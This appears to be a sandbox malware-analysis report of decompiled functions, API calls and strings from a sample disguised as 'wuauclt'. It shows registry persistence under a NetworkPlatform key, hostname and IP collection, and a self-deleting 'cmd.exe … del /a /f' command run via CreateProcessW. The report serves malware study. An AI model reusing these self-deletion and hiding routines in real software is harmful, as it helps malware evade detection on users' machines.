                                                • Opcode Fuzzy Hash: 2a1b928d30cd4bbac15f3cd26728e518a296ddbe1fb21f2d03d0c4261a3fe9dc
                                                • Instruction Fuzzy Hash: B421A375A00215EBDB108FA5EC4DBAEBBBCFB48311F108155FD18E7290DBB19958CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 323 255a50-255a7a RegOpenKeyExA 324 255a82-255aac RegQueryValueExA 323->324 325 255a7c-255a81 323->325 324->325 326 255aae-255ab3 324->326 326->325 327 255ab5-255abd 326->327 328 255b03-255b09 327->328 329 255abf-255ae8 call 2596c0 RegQueryValueExA 327->329 329->328 332 255aea-255aef 329->332 332->328 333 255af1-255b02 RegCloseKey 332->333
                                                C-Code - Quality: 100%
                                                			E00255A50(char* _a8, intOrPtr* _a12) {
                                                				int _v8;
                                                				void* _v12;
                                                				int _v16;
                                                				void* __edi;
                                                				long _t17;
                                                				int _t22;
                                                				int _t27;
                                                				intOrPtr* _t32;
                                                
                                                				_v12 = 0;
                                                				_t17 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0x20019,  &_v12); // executed
                                                				if(_t17 == 0) {
                                                					_v16 = 0;
                                                					_v8 = 0;
                                                					if(RegQueryValueExA(_v12, "LastBackup", 0,  &_v16, 0,  &_v8) != 0) {
                                                						goto L1;
                                                					} else {
                                                						_t22 = _v8;
                                                						if(_t22 == 0) {
                                                							goto L1;
                                                						} else {
                                                							_t32 = _a12;
                                                							_t30 =  *_t32;
                                                							if( *_t32 < _t22) {
                                                								L8:
                                                								return 0;
                                                							} else {
                                                								E002596C0(_t32, _a8, 0, _t30);
                                                								if(RegQueryValueExA(_v12, "LastBackup", 0, 0, _a8,  &_v8) != 0) {
                                                									goto L8;
                                                								} else {
                                                									_t27 = _v8;
                                                									if(_t27 == 0) {
                                                										goto L8;
                                                									} else {
                                                										 *_t32 = _t27;
                                                										RegCloseKey(_v12);
                                                										return 1;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					return 0;
                                                				}
                                                			}












                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00020019,00000000), ref: 00255A72
                                                • RegQueryValueExA.ADVAPI32(00000000,LastBackup,00000000,00000000,00000000,00000700), ref: 00255AA4
                                                • RegQueryValueExA.ADVAPI32(00000000,LastBackup,00000000,00000000,00000000,00000000), ref: 00255AE0
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00255AF6
                                                Strings
                                                • LastBackup, xrefs: 00255A9C, 00255AD8
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 00255A68
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: LastBackup$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1586453840-3284959219
                                                • Opcode ID: ccf20d260b35e4d0fb1277186239911baed4193086bc383eefc74786ced2c8aa
                                                • Instruction ID: 9b44b97d3b888e6cc85a7d32f012c3516047a69ec3b4d6ea6c167f9f8f919c20
                                                • Opcode Fuzzy Hash: ccf20d260b35e4d0fb1277186239911baed4193086bc383eefc74786ced2c8aa
                                                • Instruction Fuzzy Hash: F8110A75A50209BBEF20CF90EC5AFADBBBCAF04705F104195FD04E61A0E7B1AA64DA54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 82%
                                                			E002562A0(void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				short _v532;
                                                				short _v1052;
                                                				struct _PROCESS_INFORMATION _v1068;
                                                				struct _STARTUPINFOW _v1140;
                                                				signed int _t16;
                                                				int _t33;
                                                				void* _t39;
                                                				signed int _t40;
                                                
                                                				_t39 = __esi;
                                                				_t38 = __edi;
                                                				_t16 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t16 ^ _t40;
                                                				E002596C0(__edi,  &_v1052, 0, 0x208);
                                                				E002596C0(_t38,  &_v532, 0, 0x208);
                                                				GetModuleFileNameW(0,  &_v532, 0x104);
                                                				wsprintfW( &_v1052, L"cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f \"%s\"",  &_v532);
                                                				E002596C0(_t38,  &_v1140, 0, 0x44);
                                                				_v1140.cb = 0x44;
                                                				_v1140.dwFlags = 1;
                                                				_v1140.wShowWindow = 5;
                                                				asm("xorps xmm0, xmm0");
                                                				asm("movups [ebp-0x428], xmm0"); // executed
                                                				_t33 = CreateProcessW(0,  &_v1052, 0, 0, 0, 0x8000000, 0, 0,  &_v1140,  &_v1068); // executed
                                                				if(_t33 != 0) {
                                                					WaitForSingleObject(_v1068, 0);
                                                				}
                                                				return E00257097(_v8 ^ _t40, _t39);
                                                			}

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 002562ED
                                                • wsprintfW.USER32 ref: 00256306
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00256372
                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 00256384
                                                Strings
                                                • cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "%s", xrefs: 00256300
                                                • D, xrefs: 00256322
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CreateFileModuleNameObjectProcessSingleWaitwsprintf
                                                • String ID: D$cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "%s"
                                                • API String ID: 774226019-3467615674
                                                • Opcode ID: d8ef50bf67cece194d27d14e410d31bf2708c57b9fe1d5931760556416c347f4
                                                • Instruction ID: 2cc4d688dc2c09fd6e7cdc71ee07f72d4bcb7b74ff0d45eb905a9d14396f221b
                                                • Opcode Fuzzy Hash: d8ef50bf67cece194d27d14e410d31bf2708c57b9fe1d5931760556416c347f4
                                                • Instruction Fuzzy Hash: 322106B1A4021CAADB20DB609C4AFD9737CAB14705F5441A5BB08E61D1EBB16AD88F58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 91%
                                                			E002568A0(void* __edi, void* __esi, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				signed int _t11;
                                                				void* _t23;
                                                				signed int _t37;
                                                
                                                				_t35 = __edi;
                                                				_t11 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t11 ^ _t37;
                                                				E002596C0(__edi,  &_v528, 0, 0x104);
                                                				GetSystemDirectoryA( &_v528, 0x104);
                                                				E002596C0(_t35,  &_v268, 0, 0x104);
                                                				E00253D30( &_v268, "%s\\text.log",  &_v528);
                                                				_t23 = CreateFileA( &_v268, 0x40000000, 1, 0, 2, 0, 0); // executed
                                                				if(_t23 != 0xffffffff) {
                                                					FindCloseChangeNotification(_t23); // executed
                                                					DeleteFileA( &_v268); // executed
                                                					return E00257097(_v8 ^ _t37, __esi);
                                                				} else {
                                                					return E00257097(_v8 ^ _t37, __esi);
                                                				}
                                                			}

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 002568D5
                                                • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0025691F
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0025693B
                                                • DeleteFileA.KERNELBASE(?), ref: 00256948
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: File$ChangeCloseCreateDeleteDirectoryFindNotificationSystem
                                                • String ID: %s\text.log
                                                • API String ID: 204230347-1064321745
                                                • Opcode ID: 099c45838a03fdb215512049b48c236de0684b1f96a2269533ed1b8d529d8265
                                                • Instruction ID: 4c901c14de7f0b5808d3220f05f6b4e7b250a179cca4fc5b9c0ee1dd744a1fcb
                                                • Opcode Fuzzy Hash: 099c45838a03fdb215512049b48c236de0684b1f96a2269533ed1b8d529d8265
                                                • Instruction Fuzzy Hash: 4411A0B5A5020CABDF20EBA0AC4EFD9737C9B14705F500591FA09E71C2DAB16AD88F44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 365 2559d0-255a0b RegCreateKeyExA 366 255a0d-255a27 RegSetValueExA 365->366 367 255a2f-255a34 365->367 368 255a35-255a43 RegCloseKey 366->368 369 255a29 RegCloseKey 366->369 369->367
                                                C-Code - Quality: 75%
                                                			E002559D0(char* _a4, char* _a8, int _a12) {
                                                				void* _v8;
                                                				int _v12;
                                                				int _t12;
                                                				long _t14;
                                                
                                                				_v8 = 0;
                                                				_v12 = 1;
                                                				_t12 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12); // executed
                                                				if(_t12 != 0) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_t14 = RegSetValueExA(_v8, _a4, _t12, 3, _a8, _a12); // executed
                                                					_push(_v8);
                                                					if(_t14 == 0) {
                                                						RegCloseKey();
                                                						return 1;
                                                					} else {
                                                						RegCloseKey();
                                                						goto L3;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,?), ref: 00255A03
                                                • RegSetValueExA.KERNELBASE(00000000,00000001,00000000,00000003,?,?), ref: 00255A1C
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00255A29
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00255A35
                                                Strings
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 002559F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Close$CreateValue
                                                • String ID: Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1009429713-4282255057
                                                • Opcode ID: 13d431bfc1266f2d14d254843e38d7d2cf6f82e193649cf30db99af879de0d67
                                                • Instruction ID: 7bf6298cbe547b5eaa8bd66a7e3265183600b94d7bb3d75a3a10b6d8f3175863
                                                • Opcode Fuzzy Hash: 13d431bfc1266f2d14d254843e38d7d2cf6f82e193649cf30db99af879de0d67
                                                • Instruction Fuzzy Hash: E4F0F935650208BBEF219F90EC4AFA97B7CEB08705F204594FE08A5190DAB29A64AA54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00255C40(CHAR* __ecx, CHAR* __edx) {
                                                				void* _t3;
                                                				CHAR* _t7;
                                                				CHAR* _t10;
                                                
                                                				_t7 = __edx;
                                                				_t10 = __ecx;
                                                				DeleteFileA(__ecx); // executed
                                                				DeleteFileA(_t7); // executed
                                                				_t3 = CreateFileA(_t10, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                				if(_t3 != 0xffffffff) {
                                                					L2:
                                                					CloseHandle(_t3);
                                                					return 0;
                                                				} else {
                                                					_t3 = CreateFileA(_t7, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                					if(_t3 == 0xffffffff) {
                                                						return 1;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • DeleteFileA.KERNELBASE(?,00000000,00000000,?,00256ABD), ref: 00255C4E
                                                • DeleteFileA.KERNELBASE(?,?,00256ABD), ref: 00255C51
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00256ABD), ref: 00255C69
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00256ABD), ref: 00255C80
                                                • CloseHandle.KERNEL32(00000000,?,00256ABD), ref: 00255C88
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: File$CreateDelete$CloseHandle
                                                • String ID:
                                                • API String ID: 2260846778-0
                                                • Opcode ID: e115666c85602b2e17f7a2cd74800068f8fe6701f7c186a9c78b5a1d062aa3f6
                                                • Instruction ID: 3e88adb8dcd8bbe6771ddf615ba91db5d3a6a336f399e1e0b4b0e2ba31809882
                                                • Opcode Fuzzy Hash: e115666c85602b2e17f7a2cd74800068f8fe6701f7c186a9c78b5a1d062aa3f6
                                                • Instruction Fuzzy Hash: DCF0E53279032076F93016387CC6FAA175C8B85B32F340217F710BB0D18AF5785256A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 56%
                                                			E00255E20(void* __ebx, intOrPtr __ecx, void* __edi) {
                                                				signed int _v8;
                                                				char _v140;
                                                				char _v268;
                                                				char _v668;
                                                				intOrPtr _v672;
                                                				void* __esi;
                                                				signed int _t22;
                                                				char* _t24;
                                                				intOrPtr* _t32;
                                                				intOrPtr _t33;
                                                				intOrPtr* _t43;
                                                				intOrPtr* _t48;
                                                				void* _t52;
                                                				intOrPtr _t55;
                                                				void* _t58;
                                                				void* _t60;
                                                				intOrPtr* _t62;
                                                				signed int _t63;
                                                				void* _t64;
                                                				void* _t65;
                                                				void* _t66;
                                                
                                                				_t59 = __edi;
                                                				_t22 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t22 ^ _t63;
                                                				_t24 =  &_v668;
                                                				_v672 = __ecx;
                                                				__imp__#115(0x202, _t24);
                                                				if(_t24 == 0) {
                                                					E002596C0(__edi,  &_v268, _t24, 0x80);
                                                					E002596C0(_t59,  &_v140, 0, 0x80);
                                                					_t65 = _t64 + 0x18;
                                                					gethostname( &_v268, 0x80); // executed
                                                					_t32 =  &_v268;
                                                					__imp__#52(_t32); // executed
                                                					_t48 = _t32;
                                                					if(_t48 != 0) {
                                                						_t60 = 0;
                                                						do {
                                                							_t62 =  &_v140;
                                                							_t52 = _t62 + 1;
                                                							do {
                                                								_t33 =  *_t62;
                                                								_t62 = _t62 + 1;
                                                							} while (_t33 != 0);
                                                							_t61 = _t62 - _t52;
                                                							__imp__#12( *((intOrPtr*)( *((intOrPtr*)(_t60 +  *((intOrPtr*)(_t48 + 0xc)))))));
                                                							E0025BB0C( &_v140, 0x80 - _t62 - _t52,  *((intOrPtr*)(_t60 +  *((intOrPtr*)(_t48 + 0xc)))));
                                                							_t66 = _t65 + 0xc;
                                                							if( *((short*)(_t48 + 0xa)) +  *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + _t60)) <  *_t48) {
                                                								_t43 =  &_v140;
                                                								_t58 = _t43 + 1;
                                                								do {
                                                									_t55 =  *_t43;
                                                									_t43 = _t43 + 1;
                                                								} while (_t55 != 0);
                                                								goto L8;
                                                							}
                                                							break;
                                                							L8:
                                                							E0025BB0C( &_v140, 0x80 - _t43 - _t58, "_");
                                                							_t60 = _t60 + 4;
                                                							_t65 = _t66 + 0xc;
                                                						} while (_t60 < 0x1c);
                                                						E0025BAB2(_v672, 0x100,  &_v140);
                                                					}
                                                				}
                                                				return E00257097(_v8 ^ _t63, _t61);
                                                			}

                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 00255E48
                                                • gethostname.WS2_32(?,00000080), ref: 00255E8A
                                                • gethostbyname.WS2_32(?), ref: 00255E97
                                                • inet_ntoa.WS2_32(?), ref: 00255ED1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Startupgethostbynamegethostnameinet_ntoa
                                                • String ID:
                                                • API String ID: 2480646289-0
                                                • Opcode ID: 08ce0783fbef65355337c928abc3ac4a6c27ec65726b6478ed32e33c55462a8e
                                                • Instruction ID: 0607f83f65798cec1921aaaac4f4bbe6806e1e71a6826c035f9fda77f39cc800
                                                • Opcode Fuzzy Hash: 08ce0783fbef65355337c928abc3ac4a6c27ec65726b6478ed32e33c55462a8e
                                                • Instruction Fuzzy Hash: 3031BC729102199BDF208F64DC89FEA77ACAB05301F0081E5E98DD7151EE70AA9C8F58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E00256BE0(char* __edx, char* _a4, int _a8, char* _a12, char _a16) {
                                                				int _v8;
                                                				signed int _v12;
                                                				char _v20;
                                                				void* _v32;
                                                				int _v36;
                                                				char* _v40;
                                                				void* _v44;
                                                				int _v48;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t26;
                                                				long _t31;
                                                				long _t35;
                                                				char _t37;
                                                				long _t41;
                                                				char* _t43;
                                                				char* _t45;
                                                				char* _t48;
                                                				int _t52;
                                                				int _t54;
                                                				signed int _t59;
                                                
                                                				_push(0xfffffffe);
                                                				_push(0x26f6d8);
                                                				_push(E002593E0);
                                                				_push( *[fs:0x0]);
                                                				_t26 =  *0x271004; // 0x80aab37c
                                                				_v12 = _v12 ^ _t26;
                                                				_push(_t26 ^ _t59);
                                                				 *[fs:0x0] =  &_v20;
                                                				_t43 = __edx;
                                                				_v44 = 0x80000002;
                                                				_t54 = 0;
                                                				_v36 = 0;
                                                				_v8 = 0;
                                                				_t31 = RegCreateKeyExA(0x80000002, __edx, 0, 0, 0, 0xf003f, 0,  &_v32,  &_v48); // executed
                                                				if(_t31 == 0) {
                                                					_t35 = RegOpenKeyExA(0x80000002, _t43, 0, 0x2001f,  &_v32); // executed
                                                					if(_t35 == 0) {
                                                						_t52 = _a8;
                                                						if(_t52 <= 2) {
                                                							_t45 = _a12;
                                                							_t48 = _t45;
                                                							_v40 =  &(_t48[1]);
                                                							do {
                                                								_t37 =  *_t48;
                                                								_t48 =  &(_t48[1]);
                                                							} while (_t37 != 0);
                                                							RegSetValueExA(_v32, _a4, 0, _t52, _t45, _t48 - _v40 + 1); // executed
                                                							_t54 =  ==  ? 1 : 0;
                                                							goto L9;
                                                						} else {
                                                							if(_t52 == 4) {
                                                								_t41 = RegSetValueExA(_v32, _a4, 0, _t52,  &_a16, _t52);
                                                								if(_t41 == 0) {
                                                									_t14 = _t41 + 1; // 0x1
                                                									_t54 = _t14;
                                                									L9:
                                                									_v36 = _t54;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_v8 = 0xfffffffe;
                                                				E00256CE1(0x80000002);
                                                				 *[fs:0x0] = _v20;
                                                				return _t54;
                                                			}

























                                                APIs
                                                • RegCreateKeyExA.KERNELBASE(80000002,?,00000000,00000000,00000000,000F003F,00000000,002593E0,80AAB37C,80AAB37C,00000000,73B76980,?,002593E0,0026F6D8,000000FE), ref: 00256C35
                                                • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,0002001F,002593E0,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256C4B
                                                • RegSetValueExA.ADVAPI32(002593E0,?,00000000,00256FDB,000000FE,00256FDB,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256C6F
                                                • RegSetValueExA.KERNELBASE(002593E0,?,00000000,00256FDB,?,?,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256CA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Value$CreateOpen
                                                • String ID:
                                                • API String ID: 4052006930-0
                                                • Opcode ID: a9b705e561159220e5a1aca3ec47e93170a1ab57224e75fec982cf22680a6a4f
                                                • Instruction ID: c10b255c871747ff16df65685505f5aee8e57f5ec0dd87aa510f3b06b26c2f36
                                                • Opcode Fuzzy Hash: a9b705e561159220e5a1aca3ec47e93170a1ab57224e75fec982cf22680a6a4f
                                                • Instruction Fuzzy Hash: CE316D71A00209ABDB10CFA5DC88FEFBBBDEB89701F50816AF905A3261D7719915CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 65%
                                                			E00256240(CHAR* __ecx, void* __edx, long _a4) {
                                                				long _v8;
                                                				void* _t4;
                                                				int _t7;
                                                				void* _t14;
                                                				void* _t18;
                                                
                                                				_push(__ecx);
                                                				_t14 = __edx;
                                                				_v8 = 0;
                                                				_t4 = CreateFileA(__ecx, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                                                				_t18 = _t4;
                                                				if(_t18 == 0) {
                                                					L3:
                                                					return 0; // executed
                                                				} else {
                                                					_t7 = WriteFile(_t18, _t14, _a4,  &_v8, 0); // executed
                                                					_push(_t18);
                                                					if(_t7 != 0) {
                                                						FindCloseChangeNotification(); // executed
                                                						return 1;
                                                					} else {
                                                						CloseHandle();
                                                						goto L3;
                                                					}
                                                				}
                                                			}









                                                APIs
                                                • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000,?,?,00255DFD), ref: 00256262
                                                • WriteFile.KERNELBASE(00000000,00000000,00255DFD,00000000,00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000), ref: 00256279
                                                • CloseHandle.KERNEL32(00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000,?,?,00255DFD), ref: 00256284
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000,?,?,00255DFD), ref: 00256292
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CloseFile$ChangeCreateFindHandleNotificationWrite
                                                • String ID:
                                                • API String ID: 2570977422-0
                                                • Opcode ID: c831ca9c7e3900d7dbb4fc765e2a2ca890d8c5fb793024027880a9bb36f71ff9
                                                • Instruction ID: 0d106706b34bbc0c779a464abc685a5464875258973f043b8eb748f1bb8be138
                                                • Opcode Fuzzy Hash: c831ca9c7e3900d7dbb4fc765e2a2ca890d8c5fb793024027880a9bb36f71ff9
                                                • Instruction Fuzzy Hash: 78F0B432151214BBDB304B45BC0EFDB7B6CDB85B21F008145FE08D6181AEB2594186E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0025A427(signed int __ecx) {
                                                				intOrPtr _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr _t14;
                                                				intOrPtr _t18;
                                                				signed int _t21;
                                                				signed int _t27;
                                                				intOrPtr _t29;
                                                				intOrPtr _t30;
                                                
                                                				_t23 = __ecx;
                                                				_t9 =  *0x27393c; // 0x200
                                                				_t29 = 3;
                                                				if(_t9 != 0) {
                                                					__eflags = _t9 - _t29;
                                                					if(_t9 < _t29) {
                                                						_t9 = _t29;
                                                						goto L4;
                                                					}
                                                				} else {
                                                					_t9 = 0x200;
                                                					L4:
                                                					 *0x27393c = _t9;
                                                				}
                                                				_t10 = E0025D3BF(_t23, _t9, 4); // executed
                                                				 *0x273940 = _t10;
                                                				E0025D2F4(0);
                                                				if( *0x273940 != 0) {
                                                					L8:
                                                					_t27 = 0;
                                                					__eflags = 0;
                                                					_t30 = 0x272470;
                                                					do {
                                                						_t1 = _t30 + 0x20; // 0x272490
                                                						E0025D7A8(_t23, __eflags, _t1, 0xfa0, 0);
                                                						_t14 =  *0x273940; // 0x0
                                                						 *((intOrPtr*)(_t14 + _t27 * 4)) = _t30;
                                                						_t23 = (_t27 & 0x0000003f) * 0x30;
                                                						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0x273b90 + (_t27 >> 6) * 4)) + 0x18 + (_t27 & 0x0000003f) * 0x30));
                                                						__eflags = _t18 - 0xffffffff;
                                                						if(_t18 == 0xffffffff) {
                                                							L12:
                                                							 *((intOrPtr*)(_t30 + 0x10)) = 0xfffffffe;
                                                						} else {
                                                							__eflags = _t18 - 0xfffffffe;
                                                							if(_t18 == 0xfffffffe) {
                                                								goto L12;
                                                							} else {
                                                								__eflags = _t18;
                                                								if(_t18 == 0) {
                                                									goto L12;
                                                								}
                                                							}
                                                						}
                                                						_t30 = _t30 + 0x38;
                                                						_t27 = _t27 + 1;
                                                						__eflags = _t30 - 0x272518;
                                                					} while (__eflags != 0);
                                                					__eflags = 0;
                                                					return 0;
                                                				} else {
                                                					 *0x27393c = _t29;
                                                					 *0x273940 = E0025D3BF(_t23, _t29, 4);
                                                					_t21 = E0025D2F4(0);
                                                					if( *0x273940 != 0) {
                                                						goto L8;
                                                					} else {
                                                						return _t21 | 0xffffffff;
                                                					}
                                                				}
                                                			}












                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
